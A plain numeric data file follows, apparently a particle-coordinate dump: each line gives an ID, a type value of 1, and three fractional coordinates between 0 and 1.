1343 1 0.930625 0.623874 0.303976
1192 1 0.121315 0.682144 0.182397
1219 1 0.0658642 0.74876 0.181109
1224 1 0.123441 0.806822 0.185771
1314 1 0.067567 0.680242 0.244918
1320 1 0.121387 0.684503 0.315661
1346 1 0.0657647 0.811514 0.251259
1347 1 0.0682318 0.749577 0.310185
1349 1 0.128515 0.748702 0.245367
1352 1 0.129667 0.803321 0.30593
1316 1 0.00889064 0.691355 0.309281
1348 1 0.00553849 0.805411 0.308502
1188 1 0.00555038 0.683911 0.189657
1220 1 0.00562829 0.815705 0.187104
1345 1 0.00252701 0.749641 0.251122
1196 1 0.250136 0.680218 0.18203
1223 1 0.187319 0.742312 0.186541
1227 1 0.303428 0.746647 0.181104
1228 1 0.256744 0.817229 0.194669
1318 1 0.182045 0.684368 0.246889
1322 1 0.309717 0.690109 0.247699
1324 1 0.24817 0.679983 0.311438
1350 1 0.187132 0.808167 0.242536
1351 1 0.194924 0.749163 0.308212
1353 1 0.254505 0.757832 0.252958
1354 1 0.32317 0.817407 0.248386
1355 1 0.309241 0.749002 0.320474
1356 1 0.253366 0.812762 0.31526
1200 1 0.375827 0.686961 0.188402
1231 1 0.434284 0.740784 0.178755
1232 1 0.378772 0.809647 0.18903
1326 1 0.429806 0.676622 0.246093
1328 1 0.373572 0.681097 0.306275
1357 1 0.376078 0.745004 0.247799
1358 1 0.44257 0.804676 0.235684
1359 1 0.438002 0.742709 0.305655
1360 1 0.381418 0.803988 0.316611
1364 1 0.498394 0.808406 0.309765
1332 1 0.497658 0.686486 0.301762
1204 1 0.496164 0.688917 0.188828
1361 1 0.502942 0.750365 0.247656
1236 1 0.503074 0.814209 0.181765
1208 1 0.626205 0.69269 0.17999
1235 1 0.556636 0.749701 0.186022
1330 1 0.561246 0.691831 0.245483
1336 1 0.622818 0.689496 0.311197
1363 1 0.566052 0.7559 0.305096
1365 1 0.624614 0.74734 0.247743
1368 1 0.632085 0.809917 0.308462
1240 1 0.636376 0.805363 0.195089
1362 1 0.567843 0.812755 0.249564
1212 1 0.743782 0.698521 0.184747
1239 1 0.688726 0.750976 0.186648
1243 1 0.813274 0.749533 0.181944
1244 1 0.748021 0.812946 0.181916
1334 1 0.687421 0.696684 0.25018
1338 1 0.805068 0.682694 0.250297
1340 1 0.745689 0.687716 0.30379
1366 1 0.698684 0.807087 0.252646
1367 1 0.685216 0.747834 0.311093
1369 1 0.762617 0.754917 0.250067
1370 1 0.813176 0.813915 0.254681
1371 1 0.814587 0.750045 0.318213
1372 1 0.746236 0.816894 0.313889
1216 1 0.873006 0.688916 0.185072
1247 1 0.938975 0.753552 0.182833
1248 1 0.874625 0.812647 0.184601
1342 1 0.936253 0.688833 0.242172
1344 1 0.872415 0.689927 0.295685
1373 1 0.871555 0.752639 0.251582
1374 1 0.945465 0.809778 0.243781
1375 1 0.939825 0.740297 0.30529
1376 1 0.880744 0.815444 0.316206
1251 1 0.0629316 0.883502 0.182283
1256 1 0.129947 0.943632 0.18093
1378 1 0.0680711 0.935206 0.249306
1379 1 0.0621226 0.872506 0.310709
1381 1 0.12377 0.875542 0.243287
1384 1 0.130905 0.933322 0.313781
1377 1 0.00271139 0.879014 0.245199
261 1 0.129025 0.991171 0.256219
135 1 0.192878 0.996585 0.185668
1255 1 0.190273 0.877806 0.17825
1259 1 0.318247 0.877422 0.184444
1260 1 0.264307 0.939578 0.17786
1382 1 0.188791 0.933783 0.239815
1383 1 0.190964 0.870725 0.306764
1385 1 0.251604 0.875399 0.248981
1386 1 0.310184 0.938797 0.248039
1387 1 0.313521 0.873651 0.311153
1388 1 0.252573 0.932599 0.312081
265 1 0.246237 0.986803 0.249918
263 1 0.197394 0.996624 0.309041
1263 1 0.443416 0.879912 0.182599
1264 1 0.374795 0.936869 0.181855
1389 1 0.381421 0.872497 0.249555
1390 1 0.436095 0.931075 0.245667
1391 1 0.433585 0.866596 0.314556
1392 1 0.383266 0.933989 0.306872
1268 1 0.499071 0.938318 0.183986
1393 1 0.499808 0.869319 0.251289
271 1 0.441281 0.999322 0.315895
143 1 0.443972 0.997772 0.187541
275 1 0.569112 0.998609 0.312686
277 1 0.630301 0.997724 0.255982
1396 1 0.500789 0.94428 0.304847
1267 1 0.563561 0.869175 0.192149
1272 1 0.623925 0.935229 0.185471
1394 1 0.571528 0.940555 0.248058
1395 1 0.565749 0.878778 0.308217
1397 1 0.628691 0.86774 0.247956
1400 1 0.630768 0.932615 0.316241
1271 1 0.685567 0.874085 0.188878
1275 1 0.81288 0.880242 0.190026
1276 1 0.742468 0.935408 0.190044
1398 1 0.69 0.936625 0.261557
1399 1 0.686085 0.872537 0.312539
1401 1 0.755178 0.875745 0.253877
1402 1 0.804275 0.937611 0.258994
1403 1 0.815481 0.87646 0.322073
1404 1 0.748483 0.941403 0.321674
1380 1 0.992871 0.935847 0.309239
1252 1 0.99976 0.938809 0.191236
1279 1 0.932064 0.869675 0.192263
1280 1 0.866105 0.936473 0.196878
1405 1 0.879528 0.871521 0.252609
1406 1 0.931259 0.937522 0.252014
1407 1 0.945321 0.871211 0.310519
1408 1 0.870071 0.940235 0.311838
1411 1 0.0554653 0.5025 0.443998
1413 1 0.12576 0.505361 0.374534
1410 1 0.057914 0.565158 0.384669
1416 1 0.124348 0.556287 0.440408
1443 1 0.0596079 0.630921 0.439129
1445 1 0.121513 0.624217 0.378413
1412 1 0.00306583 0.564244 0.442132
1538 1 0.0622683 0.572828 0.494632
1441 1 0.00255037 0.623518 0.370752
1573 1 0.131707 0.618626 0.496666
1417 1 0.255329 0.502375 0.371064
1449 1 0.250743 0.622499 0.373701
1451 1 0.306974 0.62328 0.441374
1420 1 0.245607 0.55697 0.433311
1447 1 0.192644 0.621207 0.437126
1414 1 0.189204 0.558252 0.373546
1418 1 0.312037 0.561892 0.378326
1415 1 0.187586 0.500534 0.438394
1546 1 0.310912 0.563565 0.497547
1423 1 0.442588 0.503032 0.441072
1421 1 0.378256 0.503607 0.369805
1581 1 0.372608 0.619 0.490808
1550 1 0.437702 0.559319 0.498891
1422 1 0.44423 0.559474 0.377783
1455 1 0.440558 0.623515 0.440004
1424 1 0.374968 0.561825 0.436399
1453 1 0.37836 0.622076 0.377875
1585 1 0.494005 0.623079 0.49968
1425 1 0.503399 0.502466 0.373554
1428 1 0.505261 0.562077 0.444596
1457 1 0.502611 0.617591 0.378046
1461 1 0.626716 0.625587 0.365975
1426 1 0.56657 0.555145 0.383209
1432 1 0.627727 0.561702 0.443909
1459 1 0.569385 0.62493 0.432676
1429 1 0.630111 0.501032 0.376533
1435 1 0.811004 0.507789 0.441036
1590 1 0.680059 0.664201 0.492166
1430 1 0.687126 0.566108 0.367509
1463 1 0.685381 0.623455 0.426036
1436 1 0.746217 0.555463 0.439463
1434 1 0.811435 0.565633 0.369177
1465 1 0.745865 0.624908 0.369557
1467 1 0.808891 0.622248 0.433172
1562 1 0.809755 0.567073 0.4958
1593 1 0.748606 0.62637 0.496593
1437 1 0.881821 0.508052 0.378138
1439 1 0.933556 0.505516 0.446432
1440 1 0.877457 0.572314 0.440259
1469 1 0.870947 0.635785 0.363719
1471 1 0.942682 0.622367 0.437492
1438 1 0.932776 0.576708 0.369848
1602 1 0.0665041 0.814699 0.497904
1480 1 0.121618 0.820358 0.438743
1477 1 0.128411 0.749664 0.374391
1442 1 0.0615653 0.68764 0.377119
1475 1 0.0642824 0.744337 0.438189
1448 1 0.128259 0.686715 0.443631
1474 1 0.0615422 0.823333 0.371228
1476 1 0.0057104 0.815158 0.442266
1473 1 0.00909688 0.751311 0.368636
1609 1 0.239927 0.748911 0.497697
1482 1 0.309355 0.807271 0.373507
1478 1 0.187462 0.819582 0.365618
1484 1 0.250812 0.817016 0.43772
1479 1 0.187238 0.752099 0.439291
1452 1 0.243464 0.688668 0.439954
1481 1 0.241248 0.75322 0.38629
1450 1 0.302461 0.691466 0.379904
1446 1 0.186081 0.683287 0.374191
1483 1 0.310059 0.748857 0.441749
1578 1 0.314095 0.681443 0.496152
1613 1 0.369102 0.744865 0.496484
1614 1 0.434518 0.813058 0.493987
1488 1 0.373143 0.812348 0.430071
1487 1 0.436061 0.737935 0.44268
1454 1 0.432242 0.684247 0.375743
1456 1 0.36648 0.682421 0.431675
1486 1 0.441088 0.808763 0.377365
1485 1 0.374263 0.74516 0.373837
1489 1 0.497436 0.745385 0.373701
1617 1 0.498596 0.748594 0.497043
1621 1 0.640303 0.746537 0.496996
1492 1 0.502427 0.807847 0.436257
1460 1 0.502814 0.677287 0.440215
1490 1 0.554542 0.810929 0.371185
1458 1 0.556962 0.68768 0.374916
1464 1 0.623086 0.689771 0.435457
1493 1 0.625082 0.750963 0.377121
1496 1 0.629568 0.809101 0.441104
1491 1 0.576186 0.748488 0.439619
1626 1 0.806915 0.819438 0.493199
1466 1 0.805691 0.681642 0.372171
1497 1 0.748231 0.747585 0.373
1498 1 0.82431 0.808521 0.377481
1495 1 0.688266 0.736482 0.434952
1499 1 0.809361 0.752132 0.439567
1462 1 0.679322 0.687345 0.368053
1468 1 0.748332 0.686705 0.436848
1500 1 0.746469 0.81479 0.431738
1494 1 0.683871 0.805598 0.381416
1622 1 0.693895 0.8108 0.498953
1444 1 0.996368 0.687442 0.438677
1629 1 0.868257 0.754915 0.496523
1501 1 0.884665 0.745234 0.370901
1504 1 0.875833 0.813402 0.440608
1502 1 0.94833 0.803593 0.373288
1470 1 0.943407 0.681572 0.370515
1472 1 0.882858 0.687956 0.441179
1503 1 0.940278 0.755686 0.438066
1637 1 0.121278 0.876871 0.49736
1634 1 0.0611565 0.939256 0.493272
385 1 0.00104268 0.9999 0.373703
389 1 0.126037 0.998054 0.371823
1506 1 0.0637327 0.942364 0.365029
1512 1 0.125257 0.941605 0.435469
1509 1 0.121765 0.876383 0.366645
1507 1 0.066598 0.884364 0.431216
1505 1 0.00115062 0.882692 0.372172
387 1 0.0689596 0.999496 0.438848
393 1 0.252246 0.999615 0.376489
391 1 0.196008 0.990443 0.43458
1516 1 0.263853 0.942546 0.436543
1511 1 0.187267 0.87515 0.428823
1513 1 0.252081 0.87568 0.372816
1515 1 0.318 0.88283 0.432063
1510 1 0.182287 0.931079 0.370886
1514 1 0.313257 0.942809 0.364878
521 1 0.26367 0.999715 0.494697
1641 1 0.254124 0.875067 0.496374
1638 1 0.185991 0.927032 0.497565
397 1 0.374869 0.998446 0.374766
1645 1 0.376261 0.873734 0.498182
1520 1 0.381843 0.934223 0.429925
1517 1 0.375263 0.867918 0.370586
1518 1 0.439026 0.937452 0.372089
1519 1 0.43683 0.872705 0.430627
399 1 0.446287 0.99637 0.437713
1646 1 0.43779 0.935337 0.494418
1649 1 0.503611 0.871541 0.49853
1523 1 0.56444 0.867779 0.435626
1525 1 0.623305 0.873466 0.376082
1528 1 0.622426 0.951184 0.439184
1650 1 0.566145 0.9279 0.497763
1521 1 0.500136 0.877009 0.36735
1522 1 0.557975 0.94399 0.378393
1524 1 0.501299 0.933146 0.439355
1653 1 0.620158 0.870916 0.495947
1654 1 0.679652 0.936545 0.49318
1529 1 0.747505 0.873558 0.374525
1532 1 0.749341 0.938255 0.436435
407 1 0.691863 0.999959 0.440626
1527 1 0.682407 0.879056 0.434397
1526 1 0.688684 0.938746 0.373565
1530 1 0.817367 0.940357 0.373027
1531 1 0.811776 0.875856 0.431446
411 1 0.80639 0.994811 0.442933
1657 1 0.750036 0.875606 0.497199
413 1 0.875476 0.998306 0.373839
1533 1 0.880145 0.87657 0.376295
1534 1 0.93864 0.942672 0.376262
1535 1 0.938028 0.867609 0.441721
1536 1 0.877031 0.928474 0.442575
1508 1 0.996913 0.939686 0.438
541 1 0.867608 0.998251 0.498125
1544 1 0.119034 0.558835 0.558959
1571 1 0.0622497 0.624514 0.555996
1666 1 0.0623058 0.561177 0.623441
1701 1 0.119241 0.626076 0.624157
1669 1 0.118194 0.50082 0.621859
1539 1 0.0564996 0.501978 0.563569
1569 1 0.00100256 0.628324 0.500892
1548 1 0.249173 0.556247 0.563001
1575 1 0.187547 0.618584 0.57098
1579 1 0.325862 0.622661 0.556394
1670 1 0.176815 0.562281 0.631317
1674 1 0.310627 0.566355 0.620664
1705 1 0.25216 0.623421 0.635799
1577 1 0.246053 0.618743 0.503303
1673 1 0.251988 0.5052 0.629215
1543 1 0.184152 0.500821 0.574027
1542 1 0.189115 0.559321 0.501209
1552 1 0.381908 0.558366 0.570188
1583 1 0.439386 0.632372 0.568168
1678 1 0.437038 0.558483 0.632116
1709 1 0.373042 0.629 0.626758
1556 1 0.496682 0.558214 0.557535
1713 1 0.498145 0.627534 0.633548
1681 1 0.499543 0.50003 0.635116
1560 1 0.614556 0.556281 0.566657
1587 1 0.559893 0.631758 0.560061
1682 1 0.555905 0.567391 0.621158
1717 1 0.62741 0.617741 0.626296
1589 1 0.617261 0.616516 0.50318
1554 1 0.562074 0.556583 0.501442
1563 1 0.811225 0.508185 0.560117
1564 1 0.747734 0.561416 0.568511
1591 1 0.678531 0.617738 0.560444
1595 1 0.810336 0.625436 0.566117
1686 1 0.688642 0.55909 0.637881
1690 1 0.813954 0.561745 0.618414
1721 1 0.747103 0.624709 0.631495
1689 1 0.755999 0.5052 0.629425
1558 1 0.689747 0.555419 0.505059
1693 1 0.872997 0.501304 0.61738
1697 1 0.992815 0.625613 0.634273
1540 1 0.997993 0.566601 0.558286
1568 1 0.87479 0.566887 0.560951
1599 1 0.93999 0.629393 0.566069
1694 1 0.932354 0.56247 0.624228
1725 1 0.88093 0.626316 0.620311
1597 1 0.875068 0.632727 0.50623
1567 1 0.930587 0.504879 0.555144
1537 1 0.996044 0.503128 0.502183
1665 1 0.995877 0.503905 0.6222
1565 1 0.872761 0.506204 0.501038
1566 1 0.93836 0.568262 0.504545
1570 1 0.0641096 0.689474 0.504569
1605 1 0.128333 0.755729 0.504609
1576 1 0.123313 0.688005 0.561624
1603 1 0.0637295 0.754081 0.565347
1608 1 0.119373 0.817291 0.560459
1698 1 0.0558616 0.687858 0.621818
1730 1 0.0653288 0.815964 0.630712
1733 1 0.123736 0.754145 0.624311
1729 1 0.00517334 0.753756 0.630001
1572 1 0.000624174 0.686709 0.563886
1601 1 0.000998443 0.743621 0.500798
1580 1 0.252475 0.679551 0.566297
1607 1 0.186525 0.753887 0.572127
1611 1 0.311721 0.744349 0.560013
1612 1 0.249538 0.811428 0.557614
1702 1 0.190241 0.684821 0.62826
1706 1 0.310456 0.680721 0.627007
1734 1 0.183218 0.820738 0.627
1737 1 0.256088 0.74138 0.624233
1738 1 0.308336 0.813387 0.621994
1574 1 0.185285 0.683019 0.503614
1606 1 0.182582 0.817984 0.500264
1610 1 0.312026 0.810989 0.501657
1584 1 0.374085 0.689632 0.558912
1615 1 0.437456 0.746392 0.564988
1616 1 0.374605 0.80291 0.556984
1710 1 0.433157 0.68523 0.630239
1741 1 0.373031 0.745513 0.626219
1742 1 0.430077 0.808817 0.626754
1620 1 0.499628 0.813417 0.56158
1745 1 0.495118 0.748997 0.623059
1582 1 0.436609 0.686037 0.505048
1586 1 0.560263 0.689836 0.500605
1588 1 0.502896 0.689405 0.560717
1592 1 0.623943 0.680723 0.556968
1619 1 0.562727 0.753175 0.56814
1624 1 0.627815 0.805504 0.561308
1714 1 0.561984 0.687005 0.617026
1746 1 0.579373 0.813032 0.629986
1749 1 0.622096 0.747815 0.624301
1618 1 0.566936 0.805463 0.5003
1596 1 0.752166 0.67996 0.562281
1623 1 0.693012 0.747008 0.57195
1627 1 0.81554 0.751219 0.562735
1628 1 0.750553 0.807019 0.559189
1718 1 0.684203 0.682665 0.624207
1722 1 0.819246 0.686438 0.621419
1750 1 0.673784 0.812397 0.625214
1753 1 0.753367 0.7511 0.626049
1754 1 0.813362 0.815413 0.627734
1594 1 0.806022 0.68406 0.500437
1625 1 0.75078 0.750653 0.506146
1604 1 0.995347 0.811066 0.569382
1600 1 0.880317 0.694439 0.562016
1631 1 0.938456 0.750143 0.563102
1632 1 0.881275 0.808861 0.564992
1726 1 0.941066 0.697449 0.62793
1757 1 0.87879 0.752309 0.634008
1758 1 0.937595 0.806078 0.628623
1630 1 0.934778 0.80325 0.502442
1598 1 0.939184 0.69032 0.50195
1635 1 0.0541817 0.870841 0.56846
1640 1 0.12635 0.93388 0.562746
1762 1 0.0681476 0.932663 0.620367
1765 1 0.122891 0.87666 0.622708
1636 1 0.00157425 0.938534 0.562022
515 1 0.0703673 0.999518 0.560968
645 1 0.131743 0.995555 0.625593
1633 1 0.00532228 0.873063 0.504375
517 1 0.130482 0.993892 0.503383
1639 1 0.188148 0.877234 0.56338
1643 1 0.31236 0.869711 0.563016
1644 1 0.252374 0.933924 0.559707
1766 1 0.18728 0.937412 0.622797
1769 1 0.25338 0.879961 0.621401
1770 1 0.313217 0.932796 0.620364
649 1 0.247137 0.992232 0.621698
523 1 0.310493 0.996307 0.565896
519 1 0.192141 0.995749 0.55773
1642 1 0.315905 0.938842 0.500896
527 1 0.442207 0.990902 0.558618
1647 1 0.435686 0.866802 0.56337
1648 1 0.376841 0.940462 0.567177
1773 1 0.374848 0.875037 0.623439
1774 1 0.449204 0.93334 0.620878
653 1 0.373752 0.995633 0.623835
657 1 0.501091 0.995658 0.625647
1652 1 0.508506 0.927614 0.557993
1777 1 0.514153 0.876984 0.622685
1651 1 0.565307 0.863759 0.563472
1656 1 0.623787 0.9373 0.557918
1778 1 0.568042 0.940677 0.633984
1781 1 0.627751 0.879667 0.623737
535 1 0.690702 0.99469 0.556191
1658 1 0.811953 0.936467 0.50156
1655 1 0.687288 0.868958 0.558591
1659 1 0.815921 0.865259 0.56601
1660 1 0.748102 0.941139 0.559396
1782 1 0.68932 0.937411 0.623969
1785 1 0.749303 0.871937 0.624402
1786 1 0.809934 0.92365 0.625135
537 1 0.749148 0.999248 0.502024
665 1 0.748864 0.997697 0.628126
1761 1 0.994217 0.883749 0.623713
1662 1 0.937157 0.937996 0.50414
1663 1 0.940811 0.87562 0.559837
1664 1 0.870262 0.930471 0.564493
1789 1 0.881728 0.876805 0.630772
1790 1 0.937116 0.94171 0.618211
543 1 0.932132 0.999901 0.557159
1661 1 0.874568 0.873138 0.507702
513 1 0.993735 0.996835 0.503275
1672 1 0.128661 0.556564 0.69278
1699 1 0.0626459 0.622614 0.684618
1794 1 0.0584561 0.565807 0.754422
1800 1 0.117255 0.560376 0.816762
1827 1 0.0581086 0.621906 0.815313
1829 1 0.122176 0.626201 0.746265
1825 1 0.000927646 0.623167 0.748832
1667 1 0.0644101 0.510196 0.691298
1676 1 0.250939 0.565924 0.693475
1703 1 0.186532 0.618494 0.688592
1707 1 0.316606 0.623236 0.693135
1798 1 0.184798 0.555719 0.753055
1802 1 0.308803 0.55985 0.753777
1804 1 0.242829 0.555955 0.812048
1831 1 0.178174 0.61642 0.808433
1833 1 0.246819 0.623384 0.757083
1835 1 0.314235 0.617847 0.808405
1799 1 0.176944 0.502566 0.818962
1680 1 0.366963 0.553971 0.691225
1711 1 0.440018 0.622556 0.686064
1806 1 0.434579 0.55732 0.74967
1808 1 0.378216 0.556348 0.807915
1837 1 0.380236 0.620338 0.748389
1839 1 0.429927 0.624142 0.810753
1841 1 0.496434 0.618979 0.738948
1812 1 0.497855 0.569108 0.812532
1811 1 0.555183 0.505299 0.81179
1684 1 0.500338 0.56212 0.687628
1688 1 0.619556 0.560397 0.689018
1715 1 0.561802 0.624637 0.684268
1810 1 0.560588 0.569353 0.754978
1816 1 0.627843 0.564667 0.812796
1843 1 0.560764 0.627658 0.815531
1845 1 0.626142 0.624854 0.75372
1691 1 0.812886 0.510429 0.68981
1819 1 0.813908 0.5072 0.807933
1687 1 0.682539 0.500192 0.694734
1692 1 0.745767 0.570186 0.687849
1719 1 0.691758 0.638048 0.691398
1723 1 0.815 0.629478 0.688214
1814 1 0.685206 0.566238 0.749605
1818 1 0.807231 0.573731 0.746857
1820 1 0.750576 0.561896 0.810396
1847 1 0.691083 0.628666 0.821795
1849 1 0.741565 0.625369 0.750561
1851 1 0.814918 0.633615 0.808603
1817 1 0.749462 0.50167 0.749182
1668 1 0.994123 0.564479 0.689767
1796 1 0.992341 0.556906 0.819162
1821 1 0.875112 0.519107 0.750626
1696 1 0.868303 0.566617 0.686306
1727 1 0.931006 0.624428 0.687636
1822 1 0.938765 0.565836 0.751024
1824 1 0.873004 0.570549 0.81468
1853 1 0.878055 0.627869 0.749892
1855 1 0.937233 0.629258 0.815238
1704 1 0.127357 0.688403 0.685922
1731 1 0.0656157 0.739667 0.689659
1736 1 0.126642 0.81402 0.68583
1826 1 0.0630989 0.681175 0.751552
1832 1 0.126434 0.683295 0.812578
1858 1 0.0685548 0.813385 0.748242
1859 1 0.0654836 0.742769 0.804829
1861 1 0.123546 0.743764 0.749121
1864 1 0.123814 0.814739 0.809601
1732 1 0.00410423 0.811858 0.686413
1857 1 0.00546487 0.75727 0.743508
1700 1 0.00337364 0.685107 0.685149
1708 1 0.246202 0.684647 0.694699
1735 1 0.18533 0.748488 0.687897
1739 1 0.314409 0.745686 0.683164
1740 1 0.248577 0.815179 0.684342
1830 1 0.186578 0.687984 0.747689
1834 1 0.308037 0.680154 0.758826
1836 1 0.244019 0.691593 0.808686
1862 1 0.185986 0.814852 0.752746
1863 1 0.189409 0.755641 0.808953
1865 1 0.25004 0.752794 0.749262
1866 1 0.314838 0.823347 0.749681
1867 1 0.31622 0.757218 0.796315
1868 1 0.255785 0.820876 0.809593
1712 1 0.373635 0.686638 0.692328
1743 1 0.441849 0.749204 0.6858
1744 1 0.375673 0.816271 0.692405
1838 1 0.439246 0.684541 0.743689
1840 1 0.373856 0.685276 0.805048
1869 1 0.379728 0.744766 0.751222
1870 1 0.44066 0.803871 0.747369
1871 1 0.442798 0.75053 0.808357
1872 1 0.376326 0.820104 0.806345
1844 1 0.495254 0.682664 0.803896
1873 1 0.501716 0.750363 0.747141
1716 1 0.504841 0.69062 0.688428
1876 1 0.501742 0.812484 0.809302
1748 1 0.500809 0.815223 0.68336
1720 1 0.616985 0.684974 0.685445
1747 1 0.566337 0.751423 0.680909
1752 1 0.627526 0.82043 0.694109
1842 1 0.555983 0.681574 0.753152
1848 1 0.623222 0.688778 0.812994
1874 1 0.564661 0.803745 0.748038
1875 1 0.56412 0.748311 0.808607
1877 1 0.623871 0.746396 0.74477
1880 1 0.621131 0.807044 0.807666
1724 1 0.752983 0.689397 0.691297
1751 1 0.692449 0.752581 0.682638
1755 1 0.810602 0.753414 0.686071
1756 1 0.751069 0.812528 0.68141
1846 1 0.692438 0.694763 0.75718
1850 1 0.812349 0.694788 0.752263
1852 1 0.751713 0.686402 0.810863
1878 1 0.68747 0.809029 0.745115
1879 1 0.690596 0.75519 0.819292
1881 1 0.746244 0.754285 0.754112
1882 1 0.809917 0.812979 0.752302
1883 1 0.812113 0.748382 0.809449
1884 1 0.749354 0.812123 0.812536
1860 1 0.995338 0.81524 0.811748
1828 1 0.998973 0.683127 0.812445
1728 1 0.872015 0.688281 0.693198
1759 1 0.937343 0.750166 0.69745
1760 1 0.874753 0.810894 0.694431
1854 1 0.939853 0.688355 0.749811
1856 1 0.880896 0.695499 0.813197
1885 1 0.874497 0.750009 0.753822
1886 1 0.93311 0.819712 0.74887
1887 1 0.941366 0.748159 0.811771
1888 1 0.868601 0.815179 0.809952
771 1 0.0652551 0.998573 0.817833
1763 1 0.0595545 0.875037 0.679436
1768 1 0.122077 0.933827 0.686508
1890 1 0.0754607 0.939243 0.757212
1891 1 0.0665838 0.879346 0.812965
1893 1 0.129874 0.87298 0.753244
1896 1 0.127682 0.943416 0.823455
1764 1 0.000737483 0.948535 0.688658
1889 1 0.00152018 0.870852 0.740848
1892 1 0.00956521 0.939134 0.816562
769 1 0.00646791 0.996925 0.751376
651 1 0.312254 0.995286 0.684397
777 1 0.248955 0.995976 0.745769
1767 1 0.186497 0.873788 0.688215
1771 1 0.315509 0.873705 0.686776
1772 1 0.246137 0.938839 0.691968
1894 1 0.178034 0.943885 0.760966
1895 1 0.188015 0.870944 0.820605
1897 1 0.249049 0.872571 0.748926
1898 1 0.314196 0.934689 0.74448
1899 1 0.312011 0.879898 0.813035
1900 1 0.244108 0.933743 0.812697
779 1 0.302316 0.996075 0.813684
647 1 0.182582 0.993628 0.693338
781 1 0.368634 0.999751 0.748338
655 1 0.433668 0.998089 0.682406
785 1 0.494596 0.993296 0.746944
1775 1 0.439646 0.868516 0.679036
1776 1 0.379029 0.934447 0.679424
1901 1 0.376592 0.87721 0.745309
1902 1 0.432611 0.942566 0.750461
1903 1 0.431779 0.87466 0.821221
1904 1 0.369699 0.944457 0.815061
1908 1 0.489023 0.937407 0.816359
1905 1 0.498196 0.875171 0.744337
1780 1 0.496238 0.936127 0.689293
659 1 0.561137 0.993709 0.695018
1779 1 0.566371 0.877202 0.689495
1784 1 0.630843 0.940965 0.685754
1906 1 0.554945 0.937221 0.750168
1907 1 0.557115 0.880611 0.813823
1909 1 0.615933 0.874299 0.749116
1912 1 0.618265 0.940706 0.813014
795 1 0.812359 0.99992 0.809992
1783 1 0.691266 0.873545 0.68353
1787 1 0.816168 0.872625 0.688535
1788 1 0.74734 0.935007 0.690563
1910 1 0.685529 0.932213 0.742827
1911 1 0.686367 0.864264 0.810475
1913 1 0.74911 0.877539 0.743126
1914 1 0.814855 0.937031 0.747482
1915 1 0.808865 0.877879 0.807432
1916 1 0.744332 0.940419 0.808937
1791 1 0.938941 0.871601 0.685237
1792 1 0.877685 0.933984 0.691598
1917 1 0.872895 0.876231 0.754815
1918 1 0.938216 0.938037 0.754049
1919 1 0.93273 0.879161 0.814623
1920 1 0.875082 0.945752 0.811891
1925 1 0.115442 0.50013 0.882325
1922 1 0.0624937 0.56336 0.881055
1928 1 0.124154 0.560157 0.945431
1955 1 0.0643197 0.624432 0.942539
1957 1 0.120807 0.619835 0.882251
1924 1 0.00691918 0.564055 0.943627
1927 1 0.189645 0.505098 0.940493
1929 1 0.249734 0.501064 0.878832
1930 1 0.309503 0.5591 0.875755
1926 1 0.184794 0.561382 0.881998
1963 1 0.310629 0.615005 0.942467
1961 1 0.248489 0.616534 0.874031
1932 1 0.248518 0.562332 0.938656
1959 1 0.187392 0.625902 0.939319
1041 1 0.497269 0.50332 0.99081
1933 1 0.381089 0.504555 0.876314
1073 1 0.498667 0.620253 0.997603
1037 1 0.382452 0.500998 0.997237
1965 1 0.370931 0.617818 0.878549
1934 1 0.438366 0.566883 0.869529
1936 1 0.370007 0.559655 0.940722
1967 1 0.429809 0.620207 0.945876
1969 1 0.496138 0.63353 0.872352
1940 1 0.495981 0.568499 0.927648
1042 1 0.553235 0.559515 0.991594
1939 1 0.558882 0.500234 0.934215
1077 1 0.622034 0.619021 0.999373
1937 1 0.501454 0.500098 0.870899
1938 1 0.559521 0.566101 0.871358
1944 1 0.62387 0.563557 0.933492
1971 1 0.558954 0.625778 0.937839
1973 1 0.628654 0.624055 0.876901
1941 1 0.61971 0.503522 0.869527
1943 1 0.687763 0.512576 0.937344
1945 1 0.751291 0.501339 0.883137
1942 1 0.697516 0.562156 0.87082
1946 1 0.811446 0.558847 0.86926
1977 1 0.768596 0.630878 0.87158
1979 1 0.817754 0.629393 0.941844
1948 1 0.750465 0.561053 0.932377
1975 1 0.69477 0.626106 0.931374
1081 1 0.754896 0.618411 0.996646
1949 1 0.875218 0.50395 0.87256
1953 1 0.992481 0.625938 0.87819
1950 1 0.939078 0.56467 0.874298
1981 1 0.873885 0.631321 0.877664
1983 1 0.937413 0.622494 0.939802
1952 1 0.872688 0.561735 0.935327
1951 1 0.93788 0.506483 0.937786
1986 1 0.0698715 0.806325 0.870003
1987 1 0.0632812 0.74858 0.938523
1954 1 0.0556766 0.683892 0.87875
1992 1 0.126331 0.813577 0.938953
1989 1 0.129027 0.743516 0.867178
1960 1 0.121693 0.693166 0.928875
1985 1 0.00475754 0.752623 0.869966
1058 1 0.0649677 0.684551 0.997604
1094 1 0.187194 0.805347 0.995163
1098 1 0.317555 0.808865 0.995948
1097 1 0.250086 0.744663 0.997966
1996 1 0.241803 0.815243 0.934471
1990 1 0.184851 0.810403 0.879641
1994 1 0.316597 0.808941 0.876513
1958 1 0.191184 0.679829 0.871486
1993 1 0.247906 0.74988 0.874902
1964 1 0.245311 0.676424 0.93429
1995 1 0.312599 0.746914 0.936445
1962 1 0.311306 0.688372 0.874594
1991 1 0.190793 0.742122 0.933117
1066 1 0.312434 0.681681 0.996786
2000 1 0.374037 0.816024 0.936316
1966 1 0.425765 0.68362 0.868846
1997 1 0.372853 0.74833 0.876708
1999 1 0.435871 0.744228 0.926123
1998 1 0.434721 0.809243 0.873897
1968 1 0.36785 0.685098 0.939323
2001 1 0.498688 0.737869 0.865196
1972 1 0.497389 0.687418 0.934671
2004 1 0.494638 0.806411 0.937733
1070 1 0.435601 0.684571 0.99748
1101 1 0.378405 0.752876 0.990688
1106 1 0.565719 0.807593 0.993464
1074 1 0.564017 0.683227 0.994829
1105 1 0.501508 0.750519 0.996474
2003 1 0.559888 0.747135 0.93119
1976 1 0.626957 0.691464 0.936545
2005 1 0.627255 0.751546 0.873488
2002 1 0.560135 0.804248 0.870269
2008 1 0.621512 0.811488 0.93675
1970 1 0.561633 0.688494 0.867445
1109 1 0.628932 0.751041 0.99706
2006 1 0.689639 0.810962 0.877862
2012 1 0.760923 0.817648 0.93498
2009 1 0.750874 0.752182 0.872264
2011 1 0.811676 0.743974 0.936279
2010 1 0.812295 0.81434 0.870188
1980 1 0.751407 0.686871 0.933274
1974 1 0.69116 0.689354 0.874778
2007 1 0.700375 0.750969 0.941062
1978 1 0.820917 0.693206 0.877639
1110 1 0.699962 0.818602 0.99564
1114 1 0.824946 0.815628 0.9991
1956 1 0.999436 0.686185 0.937307
1988 1 0.995585 0.81517 0.940553
